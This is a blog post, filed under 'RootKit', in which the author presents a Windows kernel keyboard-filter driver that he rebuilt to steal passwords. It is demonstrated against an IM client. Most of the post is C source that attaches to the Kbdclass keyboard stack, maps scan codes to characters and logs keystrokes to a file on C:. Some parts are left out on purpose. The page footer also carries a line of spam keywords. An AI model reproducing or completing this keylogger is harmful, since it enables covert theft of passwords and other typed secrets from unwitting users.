S.l.e!ep.￠%

像打了激速一樣，以四倍的速度運轉，開心的工作
簡單、開放、平等的公司文化；尊重個性、自由與個人價值；

posts - 1098, comments - 335, trackbacks - 0, articles - 1

Get IM's Pwd use SYS

Posted on 2009-12-15 20:40 S.l.e!ep.￠% 閱讀(344) 評論(0) 編輯收藏引用所屬分類: RootKit

???????????????????? 今天下午沒有事做，把暑假回家寫的鍵盤過濾驅動改進成，密碼盜竊驅動。
???????????????????????????????????????????? 可以盜竊目前98%的網頁，程序，游戲的密碼。
?????????????????? 今天我來演示盜竊某著名IM軟件密碼，把密碼保存在C盤下zhuruinan.txt文本文件里
???????????????????????????????????? 通過加載zhusjm.sys過濾驅動，我們可以得到輸入的密碼。
???????????????????????????????????????????????? 通過DebugView查看我們的驅動輸出信息

????????

-----------------------------------------------------------------------------------------------------------------------------------

?????????????????????????? 過濾驅動核心代碼?? （里面。。。。部分為省略部分，可以問本人）

#include <ntddk.h>
#include <ntddkbd.h>#define KBD_DRIVER_NAME?? L"\\Driver\\Kbdclass" //把我們的設備綁定到這個驅動之上
UNICODE_STRING?? uni_DosName;
ANSI_STRING?????? ansi_FileName;
LARGE_INTEGER???? numm;
HANDLE hfile;
IO_STATUS_BLOCK zhuruinan;
OBJECT_ATTRIBUTES sjm;
UNICODE_STRING make;
LONG we=1;typedef struct zhuruinan
{
???? // 這個結構的大小
???? ULONG NodeSize;
???? // 過濾設備對象
???? PDEVICE_OBJECT pFilterDeviceObject;
???? // 同時調用時的保護鎖
???? KSPIN_LOCK IoRequestsSpinLock;???? KEVENT IoInProgressEvent;
???? // 綁定的設備對象
???? PDEVICE_OBJECT TargetDeviceObject;
???? // 綁定前底層設備對象
???? PDEVICE_OBJECT LowerDeviceObject;
} KEY_ZHU_SJM, *PKEY_ZHU_SJM;NTSTATUS?? writyu( IN PKEY_ZHU_SJM devExt,IN PDEVICE_OBJECT pFilterDeviceObject, IN PDEVICE_OBJECT pTargetDeviceObject,IN PDEVICE_OBJECT pLowerDeviceObject )
?? {
???? memset(devExt, 0, sizeof(KEY_ZHU_SJM));
???? devExt->NodeSize = sizeof(KEY_ZHU_SJM);
???? devExt->pFilterDeviceObject = pFilterDeviceObject;
???? KeInitializeSpinLock(&(devExt->IoRequestsSpinLock));
???? KeInitializeEvent(&(devExt->IoInProgressEvent), NotificationEvent, FALSE);
???? devExt->TargetDeviceObject = pTargetDeviceObject;
???? devExt->LowerDeviceObject = pLowerDeviceObject;
???? return( STATUS_SUCCESS );
?? }NTSTATUS?? ObReferenceObjectByName(?????????? //通過這個未公開函數獲取系統鍵盤設備驅動Kbdclass的指針
???????????????????????? PUNICODE_STRING ObjectName,
???????????????????????? ULONG Attributes,
???????????????????????? PACCESS_STATE AccessState,
???????????????????????? ACCESS_MASK DesiredAccess,
???????????????????????? POBJECT_TYPE ObjectType,
???????????????????????? KPROCESSOR_MODE AccessMode,
???????????????????????? PVOID ParseContext,
???????????????????????? PVOID *Object
???????????????????????? );extern POBJECT_TYPE IoDriverObjectType;
ULONG keynumber = 0;#define?? DELAY_ONE_MICROSECOND?? (-10)
#define?? DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000)
#define?? DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000)
VOID?? Delmekey(IN PDEVICE_OBJECT pDeviceObject)
{
PKEY_ZHU_SJM devExt;
BOOLEAN NoRequestsOutstanding = FALSE;
devExt = (PKEY_ZHU_SJM)pDeviceObject->DeviceExtension;
__try
{
?? __try
?? {
?? IoDetachDevice(devExt->TargetDeviceObject);
?? devExt->TargetDeviceObject = NULL;
?? IoDeleteDevice(pDeviceObject);
?? devExt->pFilterDeviceObject = NULL;
?? }
?? __except (EXCEPTION_EXECUTE_HANDLER){}
}
__finally{}
return;
}VOID zhukep()
{
???????? ZwOpenFile(&hfile,
?????????????????? GENERIC_ALL,
?????????????????? &sjm,
?????????????????? &zhuruinan,
?????????????????? FILE_SHARE_READ|FILE_SHARE_WRITE,
?????????????????? FILE_SYNCHRONOUS_IO_NONALERT);
???????? ZwWriteFile(hfile,
?????? NULL,
?????? NULL,
?????? NULL,
?????? &zhuruinan,
????? 。。。。。。。。。。。。。。

????? 。。。。。。。。。。。。。。
?????? NULL);?
???????? ZwClose(hfile);
?????? 。。。。。。。。。。。。。
?????? return;}

VOID?? Unload(IN PDRIVER_OBJECT DriverObject)
{
???? PDEVICE_OBJECT DeviceObject;
???? PDEVICE_OBJECT OldDeviceObject;
???? PKEY_ZHU_SJM devExt;???? LARGE_INTEGER lDelay;
???? PRKTHREAD CurrentThread;
???? lDelay = RtlConvertLongToLargeInteger(100 * DELAY_ONE_MILLISECOND);
???? CurrentThread = KeGetCurrentThread();
???? // 把當前線程設置為低實時模式。
???? KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY);???? UNREFERENCED_PARAMETER(DriverObject);
???? // 遍歷所有設備并一律解除綁定
???? DeviceObject = DriverObject->DeviceObject;
???? while (DeviceObject)
???? {
???????? // 解除綁定并刪除所有的設備
???????? Delmekey(DeviceObject);
???????? DeviceObject = DeviceObject->NextDevice;
???? }
???? ASSERT(NULL == DriverObject->DeviceObject);???? while (keynumber)
???? {
???????? KeDelayExecutionThread(KernelMode, FALSE, &lDelay);
???? }???? KdPrint(("Key is Unload.\n"));
???? return;
}
NTSTATUS
adddriver( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
???? NTSTATUS status = 0;
???? UNICODE_STRING uniNtNameString;
???? PKEY_ZHU_SJM devExt;
???? PDEVICE_OBJECT pFilterDeviceObject = NULL;
???? PDEVICE_OBJECT pTargetDeviceObject = NULL;
???? PDEVICE_OBJECT pLowerDeviceObject = NULL;???? PDRIVER_OBJECT KbdDriverObject = NULL;
???? // 初始化一個字符串，就是Kdbclass驅動的名字。
???? RtlInitUnicodeString(&uniNtNameString, KBD_DRIVER_NAME);
???? // 請參照前面打開設備對象的例子。只是這里打開的是驅動對象。
???? status = ObReferenceObjectByName (
???????? &uniNtNameString,
???????? OBJ_CASE_INSENSITIVE,
???????? NULL,
???????? 0,
???????? IoDriverObjectType,
???????? KernelMode,
???????? NULL,
???????? &KbdDriverObject
???????? );
???? // 如果失敗了就直接返回
???? if(!NT_SUCCESS(status))
???? {
???????? return( status );
???? }
???? else
???? {
???????? // 這個打開需要解應用。早點解除了免得之后忘記。
???????? ObDereferenceObject(DriverObject);
???? }???? // 這是設備鏈中的第一個設備
???? pTargetDeviceObject = KbdDriverObject->DeviceObject;
???? // 現在開始遍歷這個設備鏈
???? while (pTargetDeviceObject)
???? {
???????? // 生成一個過濾設備，這是前面讀者學習過的。這里的IN宏和OUT宏都是
???????? // 空宏，只有標志性意義，表明這個參數是一個輸入或者輸出參數。
???????? status = IoCreateDevice(
???????????? IN DriverObject,
???????????? IN sizeof(KEY_ZHU_SJM),
???????????? IN NULL,
???????????? IN pTargetDeviceObject->DeviceType,
???????????? IN pTargetDeviceObject->Characteristics,
???????????? IN FALSE,
???????????? OUT &pFilterDeviceObject
???????????? );???????? // 如果失敗了就直接退出。
???????? if (!NT_SUCCESS(status))
???????? {
???????????? return (status);
???????? }???????? // 綁定。pLowerDeviceObject是綁定之后得到的下一個設備。也就是
???????? // 前面常常說的所謂真實設備。
???????? pLowerDeviceObject =IoAttachDeviceToDeviceStack(pFilterDeviceObject, pTargetDeviceObject);
???????? // 如果綁定失敗了，放棄之前的操作，退出。
???????? if(!pLowerDeviceObject)
???????? {
???????????? IoDeleteDevice(pFilterDeviceObject);
???????????? pFilterDeviceObject = NULL;
???????????? return( status );
???????? }???????? // 設備擴展！下面要詳細講述設備擴展的應用。
???????? devExt = (PKEY_ZHU_SJM)(pFilterDeviceObject->DeviceExtension);
???????? writyu(devExt, pFilterDeviceObject, pTargetDeviceObject,pLowerDeviceObject );
???????? // 下面的操作和前面過濾串口的操作基本一致。這里不再解釋了。
???????? pFilterDeviceObject->DeviceType=pLowerDeviceObject->DeviceType;
???????? pFilterDeviceObject->Characteristics=pLowerDeviceObject->Characteristics;
???????? pFilterDeviceObject->StackSize=pLowerDeviceObject->StackSize+1;
???????? pFilterDeviceObject->Flags |= pLowerDeviceObject->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE) ;???????? pTargetDeviceObject = pTargetDeviceObject->NextDevice;
???? }
???? return status;
}?
NTSTATUS sjmmake( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
???? // 其他IRP請求，用IoCallDriver把IRP發送到真實設備
???? IoSkipCurrentIrpStackLocation(Irp);
???? return IoCallDriver(((PKEY_ZHU_SJM)DeviceObject->DeviceExtension)->LowerDeviceObject, Irp);
}
NTSTATUS zhumake( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
???? PKEY_ZHU_SJM devExt;
???? devExt =(PKEY_ZHU_SJM)DeviceObject->DeviceExtension;
???? PoStartNextPowerIrp( Irp );
???? IoSkipCurrentIrpStackLocation( Irp );
???? return PoCallDriver(devExt->LowerDeviceObject, Irp );
}
NTSTATUS getkey( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
???? PIO_STACK_LOCATION IrpSp;
???? ULONG buf_len = 0;
???? PUCHAR buf = NULL;
???? size_t i,numKeys;
???? PKEYBOARD_INPUT_DATA KeyData;
?????
????
???? IrpSp = IoGetCurrentIrpStackLocation( Irp );???? if( NT_SUCCESS( Irp->IoStatus.Status ) )
???? {
???????? // 獲得讀請求完成后輸出的緩沖區
???????? buf = Irp->AssociatedIrp.SystemBuffer;
???????? KeyData = (PKEYBOARD_INPUT_DATA)buf;
???????? // 獲得這個緩沖區的長度。
???????? buf_len = Irp->IoStatus.Information;
???????? numKeys = buf_len / sizeof(KEYBOARD_INPUT_DATA);
???????? for(i=0;i<numKeys;++i)
?????????? {
???????????????????? if(KeyData->Flags)
?????????????????????? {
???????????????????????? if( KeyData->MakeCode==2)
?? {
???? DbgPrint("1");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"1");
????????????
?? }
???????????????????????? if( KeyData->MakeCode==3)
?? {
???? DbgPrint("2");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"2");

?? }
???????????????????????? if( KeyData->MakeCode==4)
?? {
???? DbgPrint("3");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"3");
???????
?? }
???????????????????????? if( KeyData->MakeCode==5)
?? {
???? DbgPrint("4");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"4");?? }?
???????????????????????? if( KeyData->MakeCode==6)
?? {
???? DbgPrint("5");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"5");?? }
???????????????????????? if( KeyData->MakeCode==7)
?? {
???? DbgPrint("6");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"6");
???
?? }
???????????????????????? if( KeyData->MakeCode==8)
?? {
???? DbgPrint("7");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"7");?? }
???????????????????????? if( KeyData->MakeCode==9)
?? {
???? DbgPrint("8");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"8");?? }
???????????????????????? if( KeyData->MakeCode==10)
?? {
???? DbgPrint("9");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"9");?? }
???????????????????????? if( KeyData->MakeCode==11)
?? {
???? DbgPrint("0");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"0");?? }
???????????????????????? if( KeyData->MakeCode==12)
?? {
???? DbgPrint("-");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"-");
????
?? }???????????????????????? if( KeyData->MakeCode==13)
?? {
???? DbgPrint("+");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"+");
??
?? }???????????????????????? if( KeyData->MakeCode==14)
?? {
???? DbgPrint("<-");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"<-");?? }
???????????????????????? if( KeyData->MakeCode==15)
?? {
???? DbgPrint("Tab");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"Tab");
?? }
???????????????????????? if( KeyData->MakeCode==16)
?? {
???? DbgPrint("Q");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"Q");
??????????????????????????????
?? }
???????????????????????? if( KeyData->MakeCode==17)
?? {
???? DbgPrint("W");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"W");
??????
???????????????? }
?????????????????????? if( KeyData->MakeCode==18)
?? {
???? DbgPrint("E");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"E");
????????????????
?? }
???????????????????????? if( KeyData->MakeCode==19)
?? {
???? DbgPrint("R");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"R");
???????????
?? }
???????????????????????? if( KeyData->MakeCode==20)
?? {
???? DbgPrint("T");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"T");
???????????????????????
?? }
?????????????????????? if( KeyData->MakeCode==21)
?? {
???? DbgPrint("Y");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"Y");
????????????????????
?? }
?????????????????????? if( KeyData->MakeCode==22)
?? {
???? DbgPrint("U");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"U");
??????????????
?? }
?????????????????????? if( KeyData->MakeCode==23)
?? {
???? DbgPrint("I");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"I");
???????????????????????????
?? }
?????????????????????? if( KeyData->MakeCode==24)
?? {
???? DbgPrint("O");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L"O");
??????????????????
?? 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。????????????????????
?
?????????????????? if( KeyData->MakeCode==83)
?? {
???? DbgPrint(".");
???????????????????????????????? RtlInitUnicodeString(&uni_DosName,L".");
?? }?
?????????????????? we=1;
?????????????????? RtlUnicodeStringToAnsiString(&ansi_FileName,&uni_DosName,TRUE);
?????????????????
??????????????
?????????????? }?????????? }
???? }???? keynumber--;
if( Irp->PendingReturned )
{
?? IoMarkIrpPending( Irp );
}
???? return Irp->IoStatus.Status;
}
NTSTATUS keylook( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
???? NTSTATUS status = STATUS_SUCCESS;
???? PKEY_ZHU_SJM devExt;
???? PIO_STACK_LOCATION currentIrpStack;
???? KEVENT waitEvent;
???? KeInitializeEvent( &waitEvent, NotificationEvent, FALSE ); if (Irp->CurrentLocation == 1)
{
?? ULONG ReturnedInformation = 0;
?? status = STATUS_INVALID_DEVICE_REQUEST;
?? Irp->IoStatus.Status = status;
?? Irp->IoStatus.Information = ReturnedInformation;
?? IoCompleteRequest(Irp, IO_NO_INCREMENT);
?? return(status);
}???? // 全局變量鍵計數器加1
???? keynumber++;
???? // 得到設備擴展。目的是之后為了獲得下一個設備的指針。
???? devExt =(PKEY_ZHU_SJM)DeviceObject->DeviceExtension;
???? // 設置回調函數并把IRP傳遞下去。之后讀的處理也就結束了。
???? currentIrpStack = IoGetCurrentIrpStackLocation(Irp);
???? IoCopyCurrentIrpStackLocationToNext(Irp);
???? IoSetCompletionRoutine( Irp,getkey,DeviceObject, TRUE, TRUE, TRUE );
?????? 。。。。。。?????? 。。。。。。
???? return?? IoCallDriver( devExt->LowerDeviceObject, Irp );?
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
???? ULONG i;
???? NTSTATUS status;???? // 填寫所有的分發函數的指針
???? for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
???? {
???????? DriverObject->MajorFunction = sjmmake;
???? }
???? //寫一個IRP_MJ_POWER函數。這是因為這類請求中間要調用
???? DriverObject->MajorFunction [IRP_MJ_POWER] = zhumake;
???
???? //寫一個Read分發函數,因為要的過濾就是讀取來的按鍵信息
???? DriverObject->MajorFunction[IRP_MJ_READ] =keylook;???? // 卸載函數。
???? DriverObject->DriverUnload =Unload;
???? // 綁定所有鍵盤設備
???? status =adddriver(DriverObject, RegistryPath);
???? numm.QuadPart=1;???? RtlInitUnicodeString(&make,L"\\??\\C:\\zhuruinan.TXT");
???? InitializeObjectAttributes(&sjm,&make,OBJ_CASE_INSENSITIVE,NULL,NULL);???? 。。。。。。。。。。。。。
???? 。。。。。。。。。。。。。???????
???? return status;
}

http://hi.baidu.com/zhutas/blog/item/a7db561c83daa98187d6b691.html

只有注冊用戶登錄后才能發表評論。


相關文章: Load Driver protect_pwd.txt Windows下Hook API技術 inline hook 對付API-splicing的一種簡單方法修改IAT實現API HOOK API-HOOK and ANTI-API-HOOK For Ring3 API Hook jmp 法 DirectX Input 鍵盤實現收藏一個反鍵盤記錄工具的分析不用hook 實現掛機鎖

網站導航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.￠%

Get IM's Pwd use SYS

日歷

公告

常用鏈接

留言簿(5)

隨筆分類(1107)

隨筆檔案(1098)

文章檔案(1)

相冊

收藏夾(3)

DataStruct

搜索

積分與排名

最新評論

閱讀排行榜

評論排行榜